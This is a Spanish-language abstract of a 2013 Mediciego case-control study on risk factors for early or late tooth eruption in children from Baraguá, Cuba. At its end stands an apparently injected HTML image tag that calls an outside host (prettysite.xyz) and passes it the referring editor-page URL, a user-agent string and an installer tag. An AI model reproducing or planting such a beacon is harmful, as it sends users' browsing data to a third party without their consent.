Factores de riesgo de alteraciones cronológicas de la erupción dentaria en la población del municipio Baraguá. - Morgado Serafín, Danay; García Herrera, Anerley (Mediciego, 2013)
Se realizó un estudio observacional analítico de casos y controles, en la población de 3 meses de nacidos hasta 19 años de edad, del área de salud de Gaspar del municipio Baraguá, provincia Ciego de Ávila, durante el período septiembre 2011 a septiembre 2012, con el propósito de establecer la cronología y secuencia para la erupción clínica en la dentición temporal y permanente e identificar factores de riesgo relacionados con el brote precoz y tardío de la erupción dentaria tales como: herencia, antecedentes patológicos maternos, bajo peso al nacer, evaluación nutricional del niño bajo peso y factores de riesgos locales. El universo quedó conformado con 1134 niños; se analizaron en dos grupos, uno de estudio y otro de controles. Resultó que el primer diente en brotar fue el incisivo central inferior en la dentición temporal y el primer molar inferior en la dentición permanente. La secuencia general del brote en la dentición permanente fue similar al Estudio Nacional de 1989, la erupción se adelantó en los pacientes mestizos en ambas denticiones. Los factores de riesgo: herencia, bajo peso al nacer, evaluación nutricional de bajo peso y los locales se asociaron con significación estadística a las alteraciones cronológicas en la erupción clínica, excepto los niños con antecedentes patológicos maternos.<img src="http://prettysite.xyz/acnt?_=1584034652012&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F273&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />